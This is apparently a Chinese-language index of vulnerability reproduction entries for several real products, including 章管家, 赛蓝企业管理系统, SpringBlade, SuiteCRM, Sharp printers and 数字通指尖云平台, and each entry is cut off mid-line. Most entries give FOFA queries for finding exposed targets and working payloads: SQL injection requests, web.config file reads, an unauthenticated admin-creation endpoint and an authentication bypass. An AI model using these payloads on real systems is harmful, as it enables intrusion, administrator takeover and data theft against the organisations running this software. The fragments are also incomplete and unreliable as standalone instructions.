S44-1上海建业信息科技股份-章管家-PermissionAC 漏洞描述: 章管家 /api/personSeal_jdy/saveUser.htm 接口处存在任意用户创建漏洞,未经身份验证的远程攻击者可以利用此漏洞创建管理员账户,从而接管系统后台,造成信息泄露,导致系统处于极不安全的状态。 fo
S43-1赛蓝-企业管理系统 -PermissionAC 漏洞描述: 赛蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞,未授权的远程攻击者可以利用此接口构造token绕过身份认证,使用超级管理员账户登录系统后台,造成信息泄露或者恶意破坏,使系统处于极不安全的状态。 fofa
S41-1SpringBlade-后台框架-SQL fofa语法: body=“https://bladex.vip” 漏洞复现: payload: GET /api/blade-system/menu/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1 H
S39-1SuiteCRM-SQL 漏洞复现: payload: GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(5);--+-&type=c&response=accept H
S40-1Sharp-多功能打印机-PermissionAC 漏洞复现: payload: /installed_emanual_list.html 效果图:
S38-3赛蓝-企业管理系统-SQL 漏洞复现: payload: GET /BaseModule/ExcelImport/GetImportDetailJson?ImportId=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CCHAR%2811
S38-2赛蓝-企业管理系统-任意文件读取 漏洞复现: payload: GET /Utility/GetJSFile?filePath=/web.config HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
S38-1赛蓝-企业管理系统-任意文件读取 漏洞复现: payload: GET /BaseModule/ReportManage/DownloadBuilder?filename=//web.config HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0
S37-1数字通指尖云平台-智慧政务payslip-SQL 漏洞复现: payload: GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=SELECT 4050 FROM(SELECT COUNT(*),CONCAT((